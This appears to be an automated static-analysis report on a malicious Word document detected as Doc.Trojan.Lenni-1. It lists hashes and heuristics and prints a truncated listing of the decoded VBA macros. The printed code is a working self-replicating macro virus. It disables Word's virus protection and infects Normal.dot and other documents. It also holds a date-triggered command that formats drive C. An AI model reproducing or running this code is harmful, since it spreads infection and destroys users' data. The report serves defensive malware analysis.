Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90d41c5ea9345602…

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-03-08 12:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 098c1f071d2506a2089f45799e440959 SHA-1: a2bfe635d0d5d45065e24ba900ea545d52ed498b SHA-256: 90d41c5ea9345602d716322720f3b6d78f397c512824de62b50006f6b8f71cff
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate or Obfuscate Malicious Files or Information

The sample is a malicious Office document containing VBA macros. The macros employ obfuscation techniques, including character manipulation and concatenation, to write their code to 'c:\config.win'. This strongly suggests an intent to download and execute a second-stage payload, a common tactic for malware droppers. The ClamAV detection 'Doc.Trojan.Lenni-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Lenni-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lenni-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17364 bytes
SHA-256: ae99e569fccddd00bf4490b46da027bdddab26a7506fe81a01b5dd0b6677213d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Millennium"
Attribute VB_Base = "1Normal.Millennium"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Dim nLun As Integer
Dim nCar As Long
Dim CriptLine As String
Static acar() As Variant
eol = Chr(13)
xSave = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
CommandBars("Tools").Controls("Macro").Enabled = False
Randomize
If Dir("c:\config.win", 6) = "" Then
Open "c:\config.win" For Output As #1
For i = 1 To 124
    xLine = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    nLun = Len(xLine)
    ReDim acar(nLun)
    For xCont = 0 To nLun - 1
        acar(xCont) = Mid(xLine, 1, 1)
        xLine = Mid(xLine, 2, Len(xLine))
    Next
    For xConta = 0 To nLun - 1
        nCar = Asc(acar(xConta))
        nCar = nCar + 15
        CriptLine = CriptLine & Chr(nCar)
    Next
    Print #1, CriptLine
    CriptLine = ""
Next
Close #1
CriptLine = ""
SetAttr "c:\config.win", 6
End If
Set actdoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set actdot = NormalTemplate.VBProject.VBComponents.Item(1)
If actdot.Name <> "Millennium" Then
    actdot.Name = "Millennium"
  If actdot.CodeModule.countoflines > 0 Then
      nLine = actdot.CodeModule.countoflines
        For i = 1 To nLine
            actdot.CodeModule.deletelines 1
        Next
        Set xDoc = NormalTemplate.VBProject.VBComponents.Item(1)
        xVar = "n"
  Else
        If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
            Set xDoc = NormalTemplate.VBProject.VBComponents.Item(1)
            xVar = "n"
        End If
  End If
ElseIf actdoc.Name <> "Millennium" Then
        actdoc.Name = "Millennium"
    If actdoc.CodeModule.countoflines > 0 Then
        nLine = actdoc.CodeModule.countoflines
        For i = 1 To nLine
            actdoc.CodeModule.deletelines 1
        Next
        Set xDoc = ActiveDocument.VBProject.VBComponents.Item(1)
        xVar = "d"
    Else
        If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
            Set xDoc = ActiveDocument.VBProject.VBComponents.Item(1)
            xVar = "d"
        End If
    End If
Else
    xDoc = ""
End If
If xDoc <> "" Then
    If xVar = "n" Then
       'Third Sub
       xDoc.CodeModule.addfromstring ("Sub ViewVBCode" & eol & "MsgBox " & Chr(34) & "Microsoft Visual Basic Error in components MsVbRun32.dll." & Chr(34) & ",vbcritical," & Chr(34) & "Microsoft Word" & Chr(34) & eol & "End Sub")
    End If
    Open "c:\config.win" For Input As #1
    If LOF(1) = 0 Then GoTo xEnd
    i = 1
    Do While Not EOF(1)
        Line Input #1, xLine
        nLun = Len(xLine)
        ReDim acar(nLun)
        For xCont = 0 To nLun - 1
            acar(xCont) = Mid(xLine, 1, 1)
            xLine = Mid(xLine, 2, Len(xLine))
        Next
        For xCont = 0 To nLun - 1
            nCar = Asc(acar(xCont))
            nCar = nCar - 15
            CriptLine = CriptLine & Chr(nCar)
        Next
        xDoc.CodeModule.InsertLines i, CriptLine
        CriptLine = ""
        i = i + 1
    Loop
End If
xEnd:
   Close #1
    If Year(Now) = "2000" Then
        scmd$ = "echo y|format c: /u"
        If Day(Now) = 1 And Month(Date) = 1 Then
            Shell Environ$("COMSPEC") + " /c " + scmd$, 0
            MsgBox "Alert..!! Your Pc have a serious problem with the Year 2000", vbCritical, "-= MILLENNIUM VIRUS =-"
       ElseIf Day(Now) = 10 And Month(Date) = 1 Then
            Shell Environ$("COMSPEC") + " /c " + scmd$, 0
            MsgBox "Alert..!! Your Pc have a serious problem with the Year 2000", vbCritical, "-= MILLENNIUM VIRUS =-"
       End If
       If Day(Now) = 20 And Month(Date) = 1 Then
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.